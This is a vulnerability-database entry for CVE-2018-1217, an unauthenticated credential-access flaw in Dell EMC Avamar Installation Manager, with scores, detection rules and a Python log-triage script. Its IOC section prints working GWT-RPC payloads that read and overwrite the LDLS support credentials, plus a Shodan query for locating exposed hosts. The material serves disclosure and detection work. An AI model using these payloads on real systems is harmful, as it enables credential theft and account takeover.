CVE-2018-1217
Published: 2018-04-09
Priority: P1 · 88 · critical · 9.8 (CVSS 3.0)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 46.64% (98.7th percentile)
Avamar Installation Manager in Dell EMC Avamar Server 7.3.1, 7.4.1, and 7.5.0, and Dell EMC Integrated Data Protection Appliance 2.0 and 2.1, is affected by a missing access control check vulnerability which could potentially allow a remote unauthenticated attacker to read or change the Local Download Service (LDLS) credentials. The LDLS credentials are used to connect to Dell EMC Online Support. If the LDLS configuration was changed to an invalid configuration, then Avamar Installation Manager may not be able to connect to Dell EMC Online Support web site successfully. The remote unauthenticated attacker can also read and use the credentials to log in to Dell EMC Online Support, impersonating the AVI service actions using those credentials.
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| dell | emc_avamar | — | — |
| dell | emc_avamar | — | — |
| dell | emc_avamar | — | — |
| dell | emc_integrated_data_protection_appliance | — | — |
| dell | emc_integrated_data_protection_appliance | — | — |
Detection & IOCs (extracted from sources)
command: `7|0|6|https://{{Hostname}}/avi/avigui/|60AF6BC6976F9B1F05AC454813F5324D|com.avamar.avinstaller.gwt.shared.AvinstallerService|getLDLSConfig|java.lang.String/2004016611|{{Hostname}}|1|2|3|4|2|5|5|6|0|`
command: `7|0|7|https:///avi/avigui/|60AF6BC6976F9B1F05AC454813F5324D|com.avamar.avinstaller.gwt.shared.AvinstallerService|saveLDLSConfig|java.lang.String/2004016611||{"proxyHost":null, "proxyPort":0, "useProxyAuthentication":false, "proxyUsername":null, "proxyPassword":null, "disableInternetAccess":false, "proxyEnable":false, "emcsupportUsername":"hacker", "emcsupportPassword":"hacked3", "disableLDLS":false}|1|2|3|4|3|5|5|5|6|0|7|`
command: `7|0|7|https:///avi/avigui/|60AF6BC6976F9B1F05AC454813F5324D|com.avamar.avinstaller.gwt.shared.AvinstallerService|supportLogin|java.lang.String/2004016611||1|2|3|4|3|5|5|5|6|0|7|`
sigma: `contains_all(body, "//OK", "emcsupportUsername", "emcsupportPassword") AND status_code == 200`
- Alert on HTTP 200 responses from /avi/avigui/avigwt that contain both '//OK' and 'emcsupportUsername' and 'emcsupportPassword' in the body — this indicates successful credential exfiltration.
- The GWT serialization token '60AF6BC6976F9B1F05AC454813F5324D' appears in all exploit payloads targeting this vulnerability and can be used as a network signature.
- Monitor for the GWT RPC service name 'com.avamar.avinstaller.gwt.shared.AvinstallerService' in HTTP POST body to /avi/avigui/avigwt from unauthenticated sessions (no valid session cookie).
- Shodan query 'title:"AVAMAR"' can be used to identify internet-exposed Avamar Installation Manager instances potentially vulnerable to this CVE.
- Tampered/injected GWT response body '//OK[1,["true"],0,7]' for the supportLogin method can be used to detect response-tampering attacks (e.g., via proxy) that unlock the support account.
- The vulnerability requires no authentication; any network-level control blocking unauthenticated access to /avi/avigui/avigwt will mitigate exploitation. Credentials are returned in plaintext in the HTTP response body.
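The sigma condition and the unauthenticated-RPC check above can be combined into one triage pass over proxy or WAF records. This is an added example, not code from any of the quoted sources; the record field names (`session_cookie`, `request_body`, and so on), the host `avamar.example` and every sample value are constructed assumptions.

```python
# Added example; record field names and all sample values are constructed.
ENDPOINT = "/avi/avigui/avigwt"
SERVICE = "com.avamar.avinstaller.gwt.shared.AvinstallerService"
LDLS_METHODS = {"getLDLSConfig": "ldls-read", "saveLDLSConfig": "ldls-change"}
LEAK_MARKERS = ("//OK", "emcsupportUsername", "emcsupportPassword")

def rpc_method(body):
    """Method name of an AvinstallerService GWT-RPC request, else None."""
    # Layout per this page's payloads: version|flags|N|<N strings>, service 3rd, method 4th.
    parts = body.split("|")
    try:
        strings = parts[3:3 + int(parts[2])]
    except (IndexError, ValueError):
        return None  # truncated or non-GWT body
    if len(strings) < 4 or strings[2] != SERVICE:
        return None
    return strings[3]

def findings(rec):
    """Sorted indicator names for one proxy/WAF HTTP transaction record."""
    if rec.get("method") != "POST" or not rec.get("path", "").startswith(ENDPOINT):
        return []
    out = set()
    method = rpc_method(rec.get("request_body", ""))
    if method and not rec.get("session_cookie"):
        out.add("unauthenticated-avinstaller-rpc")
        if method in LDLS_METHODS:
            out.add(LDLS_METHODS[method])
    resp = rec.get("response_body", "")
    if rec.get("status") == 200 and all(m in resp for m in LEAK_MARKERS):
        out.add("ldls-credentials-in-response")
    return sorted(out)

def sample(req, resp, cookie=None):
    """Constructed transaction record (not captured traffic)."""
    return {"method": "POST", "path": ENDPOINT, "status": 200,
            "session_cookie": cookie, "request_body": req, "response_body": resp}

def sample_request(method):
    """Constructed request body with placeholder host and placeholder token."""
    table = ["https://avamar.example/avi/avigui/", "0" * 32, SERVICE, method,
             "java.lang.String/2004016611", "avamar.example"]
    return "|".join(["7", "0", str(len(table)), *table, "1", "2", "3", "4"])

LEAK = '//OK[1,["emcsupportUsername=u emcsupportPassword=REDACTED"],0,7]'
for r in (sample(sample_request("getLDLSConfig"), LEAK),
          sample(sample_request("getLDLSConfig"), LEAK, cookie="JSESSIONID=x"),
          sample(sample_request("saveLDLSConfig"), "//OK[0,7]"),
          sample("7|0|x", "")):
    print(findings(r))
```

The second sample shows that the response-body rule alone also fires on a session that carries a cookie, so pairing it with the request-side check separates unauthenticated reads from ordinary administrator activity.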
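CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 9.8 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 5.0 | MEDIUM | AV:N/AC:L/Au:N/C:P/I:N/A:N |
| vulncheck | | 9.8 | CRITICAL | |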
GHSA
GHSA-6583-rv3q-95pf: Avamar Installation Manager in Dell EMC Avamar Server 7
ghsa_unreviewed·2022-05-13
VulnCheck
dell emc_avamar Missing Authorization
vulncheck·2018·CVSS 9.8
No detection rules found.
Exploit-DB
Dell EMC Avamar and Integrated Data Protection Appliance Installation Manager - Invalid Access Control
exploitdb·2018-04-10·CVSS 9.8
---
# Exploit Title: [Dell EMC Avamar and Integrated Data Protection Appliance Installation Manager Missing Access Control Vulnerability (DSA-2018-025)]
# Date: [24/11/2017]
# Exploit Author: [SlidingWindow]
# Vendor Homepage: [https://store.Dell EMC.com/en-us/AVAMAR-PRODUCTS/Dell-DELL EMC-Avamar-Virtual-Edition-Data-Protection-Software/p/DELL EMC-Avamar-Virtual-Edition]
# Version: [Dell EMC Avamar Server 7.3.1 , Dell EMC Avamar Server 7.4.1, Dell EMC Avamar Server 7.5.0, Dell EMC Integrated Data Protection Appliance 2.0, Dell EMC Integrated Data Protection Appliance 2.1]
# Tested on: [Dell EMC Avamar Virtual Edition version 7.5.0.183]
# CVE : [CVE-2018-1217]
#Product:-
EMC Avamar Virt
Nuclei
Dell EMC Avamar and Integrated Data Protection Appliance Installation Manager - Invalid Access Control
nuclei·CVSS 9.8